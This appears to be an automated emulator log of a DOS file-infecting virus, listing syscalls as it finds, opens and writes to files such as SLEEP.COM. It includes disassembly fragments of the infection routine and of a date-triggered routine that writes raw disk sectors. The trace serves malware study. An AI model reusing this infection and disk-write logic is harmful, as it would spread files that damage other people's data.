2018-12-25T11:40:26.425811412Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:26.432739543Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:26.438911159Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:26.449478714Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:26.456808443Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:26.462491935Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:26.464202589Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:26.467639149Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:26.475751754Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:26.477159709Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:26.480269729Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:26.481542811Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:26.482874237Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:26.489593196Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:26.804153145Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:26.809831488Z 42 PC: 12b19 | Get date 0x12b19: cmp dl, 0xd
0x12b1c: je 0x12b22
0x12b1e: cmp al, 1
0x12b20: jne 0x12b3f
0x12b22: xor ax, ax
0x12b24: push cs
0x12b25: pop ds
0x12b26: mov bx, si
0x12b28: mov cx, 1
0x12b2b: cdq
0x12b2c: push ax
0x12b2d: int 0x25
0x12b2f: pop ax
0x12b30: mov byte ptr [si + 0x1a], 0
0x12b34: pop ax
0x12b35: push ax
0x12b36: int 0x26
0x12b38: pop ax
0x12b39: pop ax
0x12b3a: inc ax
2018-12-25T11:40:26.812370299Z 37 PC: 12b46 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')

{"DateBased":true,"Day":7,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":294,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:40:25.298789349Z 53 PC: 12ab7 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:40:25.301297616Z 37 PC: 12ac6 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:40:25.302599558Z 26 PC: 12ace | Set disk transfer address
2018-12-25T11:40:25.303864773Z 78 PC: 12b6d | Find first file
2018-12-25T11:40:25.311836302Z 67 PC: 12b94 | Get or set file attributes
2018-12-25T11:40:25.327118348Z 67 PC: 12b9d | Get or set file attributes
2018-12-25T11:40:25.343801279Z 61 PC: 12ba6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:40:25.352259505Z 63 PC: 12baf | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:40:25.360298114Z 66 PC: 12bb7 | Move file pointer
2018-12-25T11:40:25.361836002Z 44 PC: 12bbc | Get time 0x12bbc: xchg ax, dx
0x12bbd: mov cx, 0x168
0x12bc0: push cs
0x12bc1: pop ds
0x12bc2: mov dx, si
0x12bc4: sub dx, cx
0x12bc6: add cl, al
0x12bc8: mov ah, 0x40
0x12bca: int 0x21
0x12bcc: mov ax, 0x4200
0x12bcf: xor cx, cx
0x12bd1: cdq
0x12bd2: int 0x21
0x12bd4: mov cl, 3
0x12bd6: pop ax
0x12bd7: push di
0x12bd8: sub ax, cx
0x12bda: mov di, si
0x12bdc: sub di, cx
0x12bde: mov dx, di
2018-12-25T11:40:25.364285951Z 64 PC: 12bcc | Write file or device (Write 431 bytes on handle 5)
2018-12-25T11:40:25.374161163Z 66 PC: 12bd4 | Move file pointer
2018-12-25T11:40:25.375659642Z 64 PC: 12bea | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:40:25.382786334Z 87 PC: 12bef | Get or set file date and time
2018-12-25T11:40:25.389667961Z 87 PC: 12bfa | Get or set file date and time
2018-12-25T11:40:25.392232892Z 62 PC: 12bfe | Close file
2018-12-25T11:40:25.401125311Z 67 PC: 12c06 | Get or set file attributes
2018-12-25T11:40:25.41219368Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.415043353Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.420974134Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:25.432002941Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:25.444062407Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:25.451110335Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:25.452506766Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:25.460985421Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:25.463993598Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:25.465631294Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:25.469298752Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:25.470814884Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:25.472766476Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:25.482733419Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:25.49395398Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.49704116Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.503882019Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:25.514803504Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:25.523707892Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:25.531910394Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:25.536209304Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:25.538673122Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:25.548553874Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:25.550582955Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:25.558347882Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:25.560416772Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:25.563613191Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:25.57263515Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:25.583899246Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.588061374Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.596082647Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:25.607596707Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:25.616296648Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:25.623849274Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:25.625637136Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:25.629255933Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:25.632514556Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:25.634286596Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:25.637891442Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:25.640735415Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:25.642902287Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:25.651461872Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:25.663766176Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.66706198Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.670125498Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.679848438Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:25.692363018Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:25.700224761Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:25.707872409Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:25.709922268Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:25.712496916Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:25.722650927Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:25.724419261Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:25.732275292Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:25.735574949Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:25.73744731Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:25.746183847Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:25.757423538Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.761763871Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.76497169Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.771608976Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:25.784282301Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:25.797932551Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:25.805435357Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:25.808227771Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:25.811295699Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:25.819383503Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:25.82202294Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:25.825784536Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:25.827713337Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:25.829735182Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:25.838852414Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:25.849877391Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.853145552Z 78 PC: 12b6d | Find first file (See above)
2018-12-25T11:40:25.864894071Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.872037247Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:26.240755934Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:26.249830968Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:26.262662855Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:26.264675574Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:26.268490632Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:26.275995247Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:26.278037328Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:26.28626259Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:26.289035017Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:26.291060938Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:26.298559086Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:26.311262056Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:26.315108144Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:26.322201016Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:26.334630597Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:26.342731822Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:26.350011537Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:26.353138234Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:26.3559264Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:26.364228796Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:26.366797869Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:26.3706116Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:26.372522712Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:26.374578111Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:26.38322124Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:26.395002756Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:26.398506962Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:26.406416747Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:26.418872826Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:26.427401847Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:26.435036407Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:26.437213015Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:26.440025899Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:26.449281781Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:26.451420561Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:26.454567057Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:26.456315085Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:26.458596997Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:26.465931024Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:26.477401846Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:26.485792444Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:26.492635956Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:26.503477575Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:26.511556861Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:26.517808208Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:26.519914838Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:26.523136188Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:26.533517293Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:26.535265816Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:26.539764068Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:26.541859604Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:26.544058012Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:26.553106282Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:26.564296534Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:26.571191048Z 42 PC: 12b19 | Get date 0x12b19: cmp dl, 0xd
0x12b1c: je 0x12b22
0x12b1e: cmp al, 1
0x12b20: jne 0x12b3f
0x12b22: xor ax, ax
0x12b24: push cs
0x12b25: pop ds
0x12b26: mov bx, si
0x12b28: mov cx, 1
0x12b2b: cdq
0x12b2c: push ax
0x12b2d: int 0x25
0x12b2f: pop ax
0x12b30: mov byte ptr [si + 0x1a], 0
0x12b34: pop ax
0x12b35: push ax
0x12b36: int 0x26
0x12b38: pop ax
0x12b39: pop ax
0x12b3a: inc ax

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":294,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:40:25.292716681Z 53 PC: 12ab7 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:40:25.294055788Z 37 PC: 12ac6 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:40:25.295020371Z 26 PC: 12ace | Set disk transfer address
2018-12-25T11:40:25.295913029Z 78 PC: 12b6d | Find first file
2018-12-25T11:40:25.301937036Z 67 PC: 12b94 | Get or set file attributes
2018-12-25T11:40:25.307189942Z 67 PC: 12b9d | Get or set file attributes
2018-12-25T11:40:25.322960889Z 61 PC: 12ba6 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:40:25.327253908Z 63 PC: 12baf | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:40:25.333268643Z 66 PC: 12bb7 | Move file pointer
2018-12-25T11:40:25.334444421Z 44 PC: 12bbc | Get time 0x12bbc: xchg ax, dx
0x12bbd: mov cx, 0x168
0x12bc0: push cs
0x12bc1: pop ds
0x12bc2: mov dx, si
0x12bc4: sub dx, cx
0x12bc6: add cl, al
0x12bc8: mov ah, 0x40
0x12bca: int 0x21
0x12bcc: mov ax, 0x4200
0x12bcf: xor cx, cx
0x12bd1: cdq
0x12bd2: int 0x21
0x12bd4: mov cl, 3
0x12bd6: pop ax
0x12bd7: push di
0x12bd8: sub ax, cx
0x12bda: mov di, si
0x12bdc: sub di, cx
0x12bde: mov dx, di
2018-12-25T11:40:25.3365736Z 64 PC: 12bcc | Write file or device (Write 431 bytes on handle 5)
2018-12-25T11:40:25.344154866Z 66 PC: 12bd4 | Move file pointer
2018-12-25T11:40:25.345122447Z 64 PC: 12bea | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:40:25.349725262Z 87 PC: 12bef | Get or set file date and time
2018-12-25T11:40:25.350938541Z 87 PC: 12bfa | Get or set file date and time
2018-12-25T11:40:25.351926695Z 62 PC: 12bfe | Close file
2018-12-25T11:40:25.35821935Z 67 PC: 12c06 | Get or set file attributes
2018-12-25T11:40:25.367970645Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.37047737Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.376838789Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:25.38641242Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:25.392777292Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:25.398985839Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:25.40059502Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:25.402625642Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:25.405234941Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:25.407096571Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:25.409532642Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:25.41075458Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:25.412471506Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:25.420013004Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:25.429540922Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.432375042Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.437726247Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:25.447095091Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:25.453729309Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:25.460203933Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:25.461380624Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:25.463539621Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:25.471126902Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:25.472192074Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:25.478720418Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:25.480205347Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:25.481100796Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:25.487101993Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:25.496849879Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.4993192Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.505516505Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:25.515444212Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:25.522324564Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:25.529102515Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:25.530477762Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:25.53253489Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:25.534630789Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:25.536037744Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:25.538454711Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:25.540008891Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:25.541296642Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:25.548677277Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:25.558687511Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.561105454Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.563485668Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.569246388Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:25.578568504Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:25.584776469Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:25.591098497Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:25.592292319Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:25.594174424Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:25.746260857Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:25.747823121Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:25.754607009Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:25.756755333Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:25.758125276Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:25.924793737Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:25.93504106Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.937733963Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:25.940173863Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:25.946942879Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:25.956325216Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:25.967415031Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:25.974494792Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:25.976040733Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:25.978011564Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:25.985395311Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:25.987485729Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:25.99021258Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:25.991958261Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:25.993431657Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:26.000532503Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:26.011309979Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:26.013892274Z 78 PC: 12b6d | Find first file (See above)
2018-12-25T11:40:26.023037993Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:26.029382158Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:26.373453358Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:26.38049981Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:26.386283054Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:26.388269004Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:26.390446484Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:26.397777067Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:26.399906974Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:26.405804214Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:26.4071868Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:26.409671454Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:26.415982999Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:26.426294752Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:26.430301659Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:26.436917279Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:26.446682159Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:26.454032358Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:26.459260907Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:26.460460489Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:26.463338711Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:26.470492381Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:26.471692551Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:26.474973367Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:26.47650209Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:26.477917397Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:26.485247817Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:26.648879586Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:26.651756253Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:26.659129737Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:27.108645623Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:27.115344072Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:27.121227759Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:27.122444773Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:27.124380274Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:27.46641418Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:27.468214415Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:27.471341125Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:27.474251465Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:27.477421383Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:27.484453337Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:27.495301657Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:27.499444616Z 67 PC: 12b94 | Get or set file attributes (See above)
2018-12-25T11:40:27.503298826Z 67 PC: 12b9d | Get or set file attributes (See above)
2018-12-25T11:40:27.509920083Z 61 PC: 12ba6 | Open file (See above)
2018-12-25T11:40:27.514474582Z 63 PC: 12baf | Read file or device (See above)
2018-12-25T11:40:27.518565494Z 66 PC: 12bb7 | Move file pointer (See above)
2018-12-25T11:40:27.521001571Z 44 PC: 12bbc | Get time (See above)
2018-12-25T11:40:27.52309306Z 64 PC: 12bcc | Write file or device (See above)
2018-12-25T11:40:27.530490276Z 66 PC: 12bd4 | Move file pointer (See above)
2018-12-25T11:40:27.533450842Z 64 PC: 12bea | Write file or device (See above)
2018-12-25T11:40:27.537156486Z 87 PC: 12bef | Get or set file date and time (See above)
2018-12-25T11:40:27.5388245Z 87 PC: 12bfa | Get or set file date and time (See above)
2018-12-25T11:40:27.54194988Z 62 PC: 12bfe | Close file (See above)
2018-12-25T11:40:27.548622828Z 67 PC: 12c06 | Get or set file attributes (See above)
2018-12-25T11:40:27.557103422Z 79 PC: 12b6d | Find next file (See above)
2018-12-25T11:40:27.561604743Z 42 PC: 12b19 | Get date 0x12b19: cmp dl, 0xd
0x12b1c: je 0x12b22
0x12b1e: cmp al, 1
0x12b20: jne 0x12b3f
0x12b22: xor ax, ax
0x12b24: push cs
0x12b25: pop ds
0x12b26: mov bx, si
0x12b28: mov cx, 1
0x12b2b: cdq
0x12b2c: push ax
0x12b2d: int 0x25
0x12b2f: pop ax
0x12b30: mov byte ptr [si + 0x1a], 0
0x12b34: pop ax
0x12b35: push ax
0x12b36: int 0x26
0x12b38: pop ax
0x12b39: pop ax
0x12b3a: inc ax